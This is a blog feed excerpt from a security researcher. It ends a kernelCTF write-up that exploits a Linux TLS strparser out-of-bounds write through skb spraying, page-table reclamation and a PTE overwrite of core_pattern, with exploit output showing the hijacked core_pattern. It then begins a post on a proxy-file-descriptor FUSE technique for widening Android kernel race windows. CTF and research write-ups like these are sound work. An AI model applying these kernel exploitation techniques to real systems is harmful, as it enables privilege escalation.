<span class="k">static</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">kmalloc_reserve</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span> <span class="o">*</span><span class="n">size</span><span class="p">,</span> <span class="n">gfp_t</span> <span class="n">flags</span><span class="p">,</span> <span class="kt">int</span> <span class="n">node</span><span class="p">,</span>
                 <span class="n">bool</span> <span class="o">*</span><span class="n">pfmemalloc</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">obj_size</span> <span class="o">=</span> <span class="n">SKB_HEAD_ALIGN</span><span class="p">(</span><span class="o">*</span><span class="n">size</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">obj_size</span> <span class="o">&lt;=</span> <span class="n">SKB_SMALL_HEAD_CACHE_SIZE</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="p">(</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">KMALLOC_NOT_NORMAL_BITS</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">obj</span> <span class="o">=</span> <span class="n">kmem_cache_alloc_node</span><span class="p">(</span><span class="n">net_hotdata</span><span class="p">.</span><span class="n">skb_small_head_cache</span><span class="p">,</span> <span class="n">flags</span> <span class="o">|</span> <span class="n">__GFP_NOMEMALLOC</span> <span class="o">|</span> <span class="n">__GFP_NOWARN</span><span class="p">,</span> <span class="n">node</span><span class="p">);</span> <span class="c1">// [1]</span>
        <span class="o">*</span><span class="n">size</span> <span class="o">=</span> <span class="n">SKB_SMALL_HEAD_CACHE_SIZE</span><span class="p">;</span>
        <span class="c1">// [...]</span>
        <span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="n">obj_size</span> <span class="o">=</span> <span class="n">kmalloc_size_roundup</span><span class="p">(</span><span class="n">obj_size</span><span class="p">);</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>After the data buffer is allocated, <code class="language-plaintext highlighter-rouge">__finalize_skb_around()</code> is called internally by <code class="language-plaintext highlighter-rouge">__build_skb_around()</code> to initialize it. Fortunately, <strong>the <code class="language-plaintext highlighter-rouge">frags[]</code> array remains uninitialized</strong>, which allows us to populate it by spraying.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// called by __build_skb_around()</span>
<span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="nf">__finalize_skb_around</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span>
                     <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">size</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">skb</span><span class="o">-&gt;</span><span class="n">head</span> <span class="o">=</span> <span class="n">data</span><span class="p">;</span>
    <span class="n">skb</span><span class="o">-&gt;</span><span class="n">data</span> <span class="o">=</span> <span class="n">data</span><span class="p">;</span>
    <span class="c1">// [...]</span>
    <span class="n">shinfo</span> <span class="o">=</span> <span class="n">skb_shinfo</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">shinfo</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">offsetof</span><span class="p">(</span><span class="k">struct</span> <span class="n">skb_shared_info</span><span class="p">,</span> <span class="n">dataref</span><span class="p">));</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Therefore, we need to find a function call to <code class="language-plaintext highlighter-rouge">alloc_skb()</code> that <strong>allocates the data buffer from <code class="language-plaintext highlighter-rouge">skb_small_head_cache</code></strong> and <strong>allows us to populate the fragment array</strong>.</p>

<p>At first, I tried spraying with TCP Unix sockets, but their data buffers are allocated from <code class="language-plaintext highlighter-rouge">kmalloc-512-cg</code>.</p>

<p>Next, I tried <strong>normal TCP sockets</strong>, and luckily, their buffers are allocated from <code class="language-plaintext highlighter-rouge">skb_small_head_cache</code> [2]. Perfect!</p>

<p>Additionally, if the packet data is passed through <strong>the <code class="language-plaintext highlighter-rouge">SYS_splice</code> system call</strong>, the message flag <code class="language-plaintext highlighter-rouge">MSG_SPLICE_PAGES</code> will be set [3], and the pages will be placed into the fragment array [4].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">tcp_sendmsg_locked</span><span class="p">(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">,</span> <span class="k">struct</span> <span class="n">msghdr</span> <span class="o">*</span><span class="n">msg</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">size</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">msg</span><span class="o">-&gt;</span><span class="n">msg_flags</span> <span class="o">&amp;</span> <span class="n">MSG_SPLICE_PAGES</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">size</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">sk</span><span class="o">-&gt;</span><span class="n">sk_route_caps</span> <span class="o">&amp;</span> <span class="n">NETIF_F_SG</span><span class="p">)</span>
            <span class="n">zc</span> <span class="o">=</span> <span class="n">MSG_SPLICE_PAGES</span><span class="p">;</span> <span class="c1">// [3]</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>

    <span class="k">while</span> <span class="p">(</span><span class="n">msg_data_left</span><span class="p">(</span><span class="n">msg</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">skb</span> <span class="o">=</span> <span class="n">tcp_stream_alloc_skb</span><span class="p">(</span><span class="n">sk</span><span class="p">,</span> <span class="n">sk</span><span class="o">-&gt;</span><span class="n">sk_allocation</span><span class="p">,</span> <span class="n">first_skb</span><span class="p">);</span> <span class="c1">// [2]</span>

        <span class="c1">// [...]</span>
        <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">zc</span> <span class="o">==</span> <span class="n">MSG_SPLICE_PAGES</span><span class="p">)</span> <span class="p">{</span>
            <span class="c1">// [...]</span>
            <span class="n">err</span> <span class="o">=</span> <span class="n">skb_splice_from_iter</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">msg</span><span class="o">-&gt;</span><span class="n">msg_iter</span><span class="p">,</span> <span class="n">copy</span><span class="p">);</span> <span class="c1">// [4]</span>
            <span class="c1">// [...]</span>
            <span class="n">copy</span> <span class="o">=</span> <span class="n">err</span><span class="p">;</span>

            <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">MSG_NO_SHARED_FRAGS</span><span class="p">))</span>
                <span class="n">skb_shinfo</span><span class="p">(</span><span class="n">skb</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">|=</span> <span class="n">SKBFL_SHARED_FRAG</span><span class="p">;</span>

            <span class="c1">// [...]</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The call flow from splice to <code class="language-plaintext highlighter-rouge">tcp_sendmsg_locked()</code> is as follows:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_splice()
=&gt; do_splice()
 =&gt; out-&gt;f_op-&gt;splice_write()
  =&gt; splice_to_socket()
   =&gt; sock_sendmsg()
    =&gt; __sock_sendmsg()
     =&gt; inet_sendmsg()
      =&gt; tcp_sendmsg()
       =&gt; tcp_sendmsg_locked()
</code></pre></div></div>

<p>Thus, we can <strong>spray a large number of TCP sockets</strong> and <strong>splice six pages into each fragment array</strong>. After that, freeing all of them will eventually cause one to be reclaimed by <code class="language-plaintext highlighter-rouge">strp-&gt;anchor</code>.</p>

<h3 id="32-spraying-pagetable">3.2. Spraying Pagetable</h3>

<p>After the pages are released, we reclaim them by <strong>spraying the page table</strong>. When an out-of-bounds access is triggered in <code class="language-plaintext highlighter-rouge">tls_strp_copyin_frag()</code> [1], packet data is copied into the fragment and the copied content is under our control. This lets us <strong>overwrite a PTE</strong>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_copyin_frag</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
                <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">in_skb</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">offset</span><span class="p">,</span>
                <span class="kt">size_t</span> <span class="n">in_len</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">frag</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">skb_shinfo</span><span class="p">(</span><span class="n">skb</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">frags</span><span class="p">[</span><span class="n">skb</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">/</span> <span class="n">PAGE_SIZE</span><span class="p">];</span>
    
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">chunk</span> <span class="o">=</span> <span class="n">min_t</span><span class="p">(</span><span class="kt">size_t</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="n">skb_frag_size</span><span class="p">(</span><span class="n">frag</span><span class="p">));</span>
        <span class="n">WARN_ON_ONCE</span><span class="p">(</span><span class="n">skb_copy_bits</span><span class="p">(</span><span class="n">in_skb</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">skb_frag_address</span><span class="p">(</span><span class="n">frag</span><span class="p">)</span> <span class="o">+</span> <span class="n">skb_frag_size</span><span class="p">(</span><span class="n">frag</span><span class="p">),</span> <span class="n">chunk</span><span class="p">));</span> <span class="c1">// [1]</span>
    <span class="p">}</span>

    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Concretely, we add a new PTE pointing to <code class="language-plaintext highlighter-rouge">core_pattern[]</code> and overwrite it. Triggering a segmentation fault then causes the kernel to use the overwritten <code class="language-plaintext highlighter-rouge">core_pattern[]</code>, allowing us to retrieve the flag.</p>

<p>The exploit for lts-6.12.46 is <a href="/assets/kernelCTF-1day-0aeb54ac.c">here</a>. It works in the remote environment as well.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@lts-6:/tmp$ ./test
./test
[+] initialize
[+] spraying pagetable
[+] count: 0 (for populate pagetable)
[+] craft PTEs
[+] /proc/sys/kernel/core_pattern: |/proc/%P/fd/666 %P

[   19.574504] test[205]: segfault at 0 ip 0000000000402a19 sp 00007fff67f2a5d0 error 6 in test[2a19,401000+96000] likely on CPU 0 (core 0, socket 0)
[   19.578581] Code: 48 89 ce 89 c7 e8 77 35 02 00 48 8d 45 c0 48 89 c6 48 8d 05 51 4d 09 00 48 89 c7 b8 00 00 00 00 e8 5c 3f 00 00 b8 00 00 00 00 &lt;41
kernelCTF{v1:lts-6.12.46:1759486024:a15c6a431f0965768f9100391e6ebb695924f1f7}
[   19.603944] sysrq: Power Off
[   19.605689] ACPI: PM: Preparing to enter system sleep state S5
[   19.607641] kvm: exiting hardware virtualization
[   19.609214] reboot: Power down
</code></pre></div></div>]]></content><author><name></name></author><category term="Linux" /><summary type="html"><![CDATA[One day, @farazsth98 asked me if I had analyzed the latest 1-day kernelCTF slot. I hadn’t analyzed it yet, but I thought it was a good time to do something interesting — especially since preparing a talk is exhausting 😭.]]></summary></entry><entry><title type="html">Implementing KernelGP to Extend the Race Window</title><link href="https://u1f383.github.io/android/2025/09/24/Implementing-KernelGP-to-extend-the-race-window.html" rel="alternate" type="text/html" title="Implementing KernelGP to Extend the Race Window" /><published>2025-09-24T00:00:00+00:00</published><updated>2025-09-24T00:00:00+00:00</updated><id>https://u1f383.github.io/android/2025/09/24/Implementing-KernelGP-to-extend-the-race-window</id><content type="html" xml:base="https://u1f383.github.io/android/2025/09/24/Implementing-KernelGP-to-extend-the-race-window.html"><![CDATA[<p>The talk <a href="https://www.youtube.com/watch?v=DJBGu2fSSZg">KernelGP: Racing Against the Android Kernel</a> at OffensiveCon 2025 demonstrates four techniques to leverage Android’s internal design to extend the race window during kernel exploitation. In this post, I will walk through my exploration of the <strong>first method</strong> — <strong>the proxy file descriptor</strong> — and explain how I implemented it. I’ll also share some side notes on writing an Android app.</p>

<h2 id="1-jni">1. JNI</h2>

<h3 id="11-introduction">1.1. Introduction</h3>

<p>JNI (Java Native Interface) is an interface between Java/Kotlin applications and C/C++ libraries. It allows developers to write C libraries and load them into applications. This is very useful in exploitation development, because applications are written in high-level languages, where we lack fine-grained control over operations.</p>

<p>To write a library, you first need to <a href="https://developer.android.com/ndk/downloads?hl=zh-tw">download the NDK</a>. It includes toolchains for building libraries, most of which are pre-built, so no additional compilation is required. I used <code class="language-plaintext highlighter-rouge">android-ndk-r27d-linux.zip</code> in my virtual machine.</p>

<p>Once uncompressed, you can use JNI APIs to write a library. For example, here is a <strong><code class="language-plaintext highlighter-rouge">hello.c</code></strong> that implements a simple JNI function returning a <code class="language-plaintext highlighter-rouge">"Hello World"</code> string:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;jni.h&gt;</span><span class="cp">
</span>
<span class="n">JNIEXPORT</span> <span class="n">jstring</span> <span class="n">JNICALL</span>
<span class="nf">Java_com_example_myapplication_MainActivity_stringFromJNI</span><span class="p">(</span><span class="n">JNIEnv</span><span class="o">*</span> <span class="n">env</span><span class="p">,</span> <span class="n">jobject</span> <span class="n">thiz</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">return</span> <span class="p">(</span><span class="o">*</span><span class="n">env</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">NewStringUTF</span><span class="p">(</span><span class="n">env</span><span class="p">,</span> <span class="s">"Hello from C!"</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The function name cannot be arbitrary — it must follow JNI naming conventions. The format is: <strong><code class="language-plaintext highlighter-rouge">Java_&lt;application_name&gt;_&lt;class_name&gt;_&lt;method_name&gt;</code></strong> with dots (<code class="language-plaintext highlighter-rouge">.</code>) in names replaced by underscores (<code class="language-plaintext highlighter-rouge">_</code>), and underscores (<code class="language-plaintext highlighter-rouge">_</code>) further escaped as <code class="language-plaintext highlighter-rouge">_1</code>.</p>

<p>The first two parameters are predefined: the <strong>JNI environment object (<code class="language-plaintext highlighter-rouge">env</code>)</strong> and the <strong>caller object (<code class="language-plaintext highlighter-rouge">thiz</code>)</strong>. The return type must be a Java-compatible type, such as <code class="language-plaintext highlighter-rouge">void</code>, <code class="language-plaintext highlighter-rouge">jboolean</code>, <code class="language-plaintext highlighter-rouge">jint</code>, <code class="language-plaintext highlighter-rouge">jstring</code>, etc.</p>

<p>To compile it, use the toolchain compiler with flags for building a shared object:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~/android-ndk-r27d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android34-clang <span class="nt">-shared</span> <span class="nt">-fPIC</span> <span class="nt">-o</span> libhello.so hello.c
</code></pre></div></div>

<p>Then, copy <code class="language-plaintext highlighter-rouge">libhello.so</code> to <code class="language-plaintext highlighter-rouge">~/path_to_your_application/app/src/main/jniLibs/arm64-v8a/</code>.</p>

<p>In the <code class="language-plaintext highlighter-rouge">com.example.myapplication</code> project, you need to add the attribute <strong><code class="language-plaintext highlighter-rouge">android:extractNativeLibs="true"</code></strong> in <code class="language-plaintext highlighter-rouge">AndroidManifest.xml</code> to ensure the application extracts native shared objects:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;application
    [...]
    android:extractNativeLibs="true"
&gt;
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">MainActivity</code> class then uses <code class="language-plaintext highlighter-rouge">System.loadLibrary()</code> to load the shared library. The file name must <strong>follow the format <code class="language-plaintext highlighter-rouge">"libXXXXX.so"</code></strong>, otherwise it will not be extracted and cannot be loaded. You also need to declare an external function for later use:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>init { System.loadLibrary("hello") }
external fun helloworld(): String
</code></pre></div></div>

<p>Now, you can call <code class="language-plaintext highlighter-rouge">helloworld()</code> anywhere in your application!</p>

<h3 id="12-real-jni">1.2. Real JNI</h3>

<p>The actual library <strong><code class="language-plaintext highlighter-rouge">libfuse_mmap.so</code></strong> used to trigger FUSE is shown below:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;jni.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;errno.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/mman.h&gt;</span><span class="cp">
</span>
<span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mh">0x100</span><span class="p">];</span>
<span class="n">JNIEXPORT</span> <span class="n">jstring</span> <span class="n">JNICALL</span>
<span class="nf">Java_com_example_fuse_1test_MainActivity_mmapfuse</span><span class="p">(</span><span class="n">JNIEnv</span><span class="o">*</span> <span class="n">env</span><span class="p">,</span> <span class="n">jobject</span> <span class="n">thiz</span><span class="p">,</span> <span class="n">jint</span> <span class="n">fd</span> <span class="cm">/* [1] */</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">void</span><span class="o">*</span> <span class="n">ptr</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="p">,</span> <span class="n">MAP_SHARED</span><span class="p">,</span> <span class="n">fd</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="c1">// [2]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">ptr</span> <span class="o">==</span> <span class="n">MAP_FAILED</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span>
        <span class="n">snprintf</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">),</span> <span class="s">"mmap failed: errno=%d (%s)"</span><span class="p">,</span> <span class="n">errno</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span>
        <span class="k">return</span> <span class="p">(</span><span class="o">*</span><span class="n">env</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">NewStringUTF</span><span class="p">(</span><span class="n">env</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="sc">'A'</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span>
    <span class="n">memcpy</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">ptr</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">);</span> <span class="c1">// [3]</span>
    <span class="k">return</span> <span class="p">(</span><span class="o">*</span><span class="n">env</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">NewStringUTF</span><span class="p">(</span><span class="n">env</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This function is called <code class="language-plaintext highlighter-rouge">mmapfuse()</code> and belongs to the <code class="language-plaintext highlighter-rouge">MainActivity</code> class in the <code class="language-plaintext highlighter-rouge">com.example.fuse_test</code> project. It takes the FUSE file descriptor as a parameter [1] and maps it into the process address space with <code class="language-plaintext highlighter-rouge">mmap()</code> [2]. When <code class="language-plaintext highlighter-rouge">memcpy()</code> reads from the mapped memory [3], <strong>page fault will be handled by the FUSE handler</strong>.</p>

<h2 id="2-app">2. App</h2>

<p>The following is the source code of the application <strong><code class="language-plaintext highlighter-rouge">com.example.fuse_test</code></strong>. I will explain it line by line.</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">class</span> <span class="nc">MainActivity</span> <span class="o">:</span> <span class="nc">ComponentActivity</span><span class="o">()</span> <span class="o">{</span>
    <span class="c1">// =============== [1] ===============</span>
    <span class="n">init</span> <span class="o">{</span> <span class="nc">System</span><span class="o">.</span><span class="na">loadLibrary</span><span class="o">(</span><span class="s">"fuse_mmap"</span><span class="o">)</span> <span class="o">}</span>
    <span class="n">external</span> <span class="n">fun</span> <span class="nf">mmapfuse</span><span class="o">(</span><span class="nl">fuseFd:</span> <span class="nc">Int</span><span class="o">):</span> <span class="nc">String</span>
    <span class="c1">// ===================================</span>

    <span class="n">override</span> <span class="n">fun</span> <span class="nf">onCreate</span><span class="o">(</span><span class="nl">savedInstanceState:</span> <span class="nc">Bundle</span><span class="o">?)</span> <span class="o">{</span> <span class="c1">// [2]</span>
        <span class="kd">super</span><span class="o">.</span><span class="na">onCreate</span><span class="o">(</span><span class="n">savedInstanceState</span><span class="o">)</span>
        <span class="n">setContent</span> <span class="o">{</span>
            <span class="c1">// =============== [3] ===============</span>
            <span class="kt">var</span> <span class="n">output</span> <span class="n">by</span> <span class="n">remember</span> <span class="o">{</span> <span class="n">mutableStateOf</span><span class="o">(</span><span class="s">"running..."</span><span class="o">)</span> <span class="o">}</span>
            <span class="kt">var</span> <span class="n">fusePfd</span> <span class="n">by</span> <span class="n">remember</span> <span class="o">{</span> <span class="n">mutableStateOf</span><span class="o">&lt;</span><span class="nc">ParcelFileDescriptor</span><span class="o">?&gt;(</span><span class="kc">null</span><span class="o">)</span> <span class="o">}</span>
            <span class="kt">var</span> <span class="n">callbackThread</span> <span class="n">by</span> <span class="n">remember</span> <span class="o">{</span> <span class="n">mutableStateOf</span><span class="o">&lt;</span><span class="nc">HandlerThread</span><span class="o">?&gt;(</span><span class="kc">null</span><span class="o">)</span> <span class="o">}</span>
            <span class="kt">var</span> <span class="n">callbackHandler</span> <span class="n">by</span> <span class="n">remember</span> <span class="o">{</span> <span class="n">mutableStateOf</span><span class="o">&lt;</span><span class="nc">Handler</span><span class="o">?&gt;(</span><span class="kc">null</span><span class="o">)</span> <span class="o">}</span>
            <span class="c1">// ===================================</span>

            <span class="nc">LaunchedEffect</span><span class="o">(</span><span class="nc">Unit</span><span class="o">)</span> <span class="o">{</span> <span class="c1">// [4]</span>
                <span class="n">callbackThread</span> <span class="o">=</span> <span class="nc">HandlerThread</span><span class="o">(</span><span class="s">"ProxyFDCallbacks"</span><span class="o">).</span><span class="na">apply</span> <span class="o">{</span> <span class="n">start</span><span class="o">()</span> <span class="o">}</span> <span class="c1">// [6]</span>
                <span class="n">callbackHandler</span> <span class="o">=</span> <span class="nc">Handler</span><span class="o">(</span><span class="n">callbackThread</span><span class="o">!!.</span><span class="na">looper</span><span class="o">)</span>
                <span class="n">val</span> <span class="n">data</span> <span class="o">=</span> <span class="s">"from FUSE callback :)"</span><span class="o">.</span><span class="na">toByteArray</span><span class="o">(</span><span class="nc">Charsets</span><span class="o">.</span><span class="na">UTF_8</span><span class="o">)</span>
                <span class="n">val</span> <span class="n">sm</span> <span class="o">=</span> <span class="n">getSystemService</span><span class="o">(</span><span class="no">STORAGE_SERVICE</span><span class="o">)</span> <span class="n">as</span> <span class="nc">StorageManager</span> <span class="c1">// [7]</span>
                
                <span class="n">fusePfd</span> <span class="o">=</span> <span class="n">sm</span><span class="o">.</span><span class="na">openProxyFileDescriptor</span><span class="o">(</span> <span class="c1">// [8]</span>
                    <span class="nc">ParcelFileDescriptor</span><span class="o">.</span><span class="na">MODE_READ_ONLY</span><span class="o">,</span>
                    <span class="nc">FuseCallback</span><span class="o">(</span><span class="n">data</span><span class="o">),</span>
                    <span class="n">callbackHandler</span>
                <span class="o">)</span>
                <span class="n">output</span> <span class="o">=</span> <span class="n">mmapfuse</span><span class="o">(</span><span class="n">fusePfd</span><span class="o">!!.</span><span class="na">fd</span><span class="o">)</span> <span class="c1">// [11]</span>
            <span class="o">}</span>

            <span class="nc">Scaffold</span><span class="o">(</span><span class="n">modifier</span> <span class="o">=</span> <span class="nc">Modifier</span><span class="o">.</span><span class="na">fillMaxSize</span><span class="o">())</span> <span class="o">{</span> <span class="n">innerPadding</span> <span class="o">-&gt;</span>
                <span class="nc">Text</span><span class="o">(</span><span class="n">output</span><span class="o">,</span> <span class="n">modifier</span> <span class="o">=</span> <span class="nc">Modifier</span><span class="o">.</span><span class="na">padding</span><span class="o">(</span><span class="n">innerPadding</span><span class="o">))</span> <span class="c1">// [12]</span>
            <span class="o">}</span>

            <span class="nc">DisposableEffect</span><span class="o">(</span><span class="nc">Unit</span><span class="o">)</span> <span class="o">{</span> <span class="c1">// [5]</span>
                <span class="n">onDispose</span> <span class="o">{</span>
                    <span class="k">try</span> <span class="o">{</span> <span class="n">fusePfd</span><span class="o">!!.</span><span class="na">close</span><span class="o">()</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nl">_:</span> <span class="nc">Exception</span><span class="o">)</span> <span class="o">{}</span>
                    <span class="n">callbackThread</span><span class="o">!!.</span><span class="na">quitSafely</span><span class="o">()</span>
                <span class="o">}</span>
            <span class="o">}</span>
        <span class="o">}</span>
    <span class="o">}</span>
<span class="o">}</span>

<span class="kd">class</span> <span class="nf">FuseCallback</span><span class="o">(</span><span class="kd">private</span> <span class="n">val</span> <span class="nl">data:</span> <span class="nc">ByteArray</span><span class="o">)</span> <span class="o">:</span> <span class="nc">ProxyFileDescriptorCallback</span><span class="o">()</span> <span class="o">{</span> <span class="c1">// [9]</span>
    <span class="n">override</span> <span class="n">fun</span> <span class="nf">onGetSize</span><span class="o">():</span> <span class="nc">Long</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="na">size</span><span class="o">.</span><span class="na">toLong</span><span class="o">()</span>
    <span class="n">override</span> <span class="n">fun</span> <span class="nf">onRead</span><span class="o">(</span><span class="nl">offset:</span> <span class="nc">Long</span><span class="o">,</span> <span class="nl">size:</span> <span class="nc">Int</span><span class="o">,</span> <span class="nl">dst:</span> <span class="nc">ByteArray</span><span class="o">):</span> <span class="nc">Int</span> <span class="o">{</span>
        <span class="k">if</span> <span class="o">(</span><span class="n">offset</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="o">||</span> <span class="n">size</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="o">)</span> <span class="k">throw</span> <span class="nc">ErrnoException</span><span class="o">(</span><span class="s">"onRead"</span><span class="o">,</span> <span class="nc">OsConstants</span><span class="o">.</span><span class="na">EINVAL</span><span class="o">)</span>
        <span class="k">if</span> <span class="o">(</span><span class="n">offset</span> <span class="o">&gt;=</span> <span class="n">data</span><span class="o">.</span><span class="na">size</span><span class="o">)</span> <span class="k">return</span> <span class="mi">0</span>
        <span class="n">val</span> <span class="n">n</span> <span class="o">=</span> <span class="n">minOf</span><span class="o">(</span><span class="n">size</span><span class="o">,</span> <span class="n">data</span><span class="o">.</span><span class="na">size</span> <span class="o">-</span> <span class="n">offset</span><span class="o">.</span><span class="na">toInt</span><span class="o">())</span>
        <span class="nc">System</span><span class="o">.</span><span class="na">arraycopy</span><span class="o">(</span><span class="n">data</span><span class="o">,</span> <span class="n">offset</span><span class="o">.</span><span class="na">toInt</span><span class="o">(),</span> <span class="n">dst</span><span class="o">,</span> <span class="mi">0</span><span class="o">,</span> <span class="n">n</span><span class="o">)</span>
        <span class="nc">Thread</span><span class="o">.</span><span class="na">sleep</span><span class="o">(</span><span class="mi">2000</span><span class="o">)</span> <span class="c1">// [10]</span>
        <span class="k">return</span> <span class="n">n</span>
    <span class="o">}</span>
    <span class="n">override</span> <span class="n">fun</span> <span class="nf">onWrite</span><span class="o">(</span><span class="nl">offset:</span> <span class="nc">Long</span><span class="o">,</span> <span class="nl">size:</span> <span class="nc">Int</span><span class="o">,</span> <span class="nl">data:</span> <span class="nc">ByteArray</span><span class="o">):</span> <span class="nc">Int</span> <span class="o">{</span>
        <span class="k">throw</span> <span class="nf">ErrnoException</span><span class="o">(</span><span class="s">"onWrite"</span><span class="o">,</span> <span class="nc">OsConstants</span><span class="o">.</span><span class="na">EBADF</span><span class="o">)</span>
    <span class="o">}</span>
    <span class="n">override</span> <span class="n">fun</span> <span class="nf">onFsync</span><span class="o">()</span> <span class="o">{}</span>
    <span class="n">override</span> <span class="n">fun</span> <span class="nf">onRelease</span><span class="o">()</span> <span class="o">{}</span>
<span class="o">}</span>
</code></pre></div></div>

<p>First, we load the <strong>shared library <code class="language-plaintext highlighter-rouge">libfuse_mmap.so</code></strong> and <strong>function <code class="language-plaintext highlighter-rouge">mmapfuse()</code></strong> [1] which was implemented in <strong>section 1.2</strong>.</p>

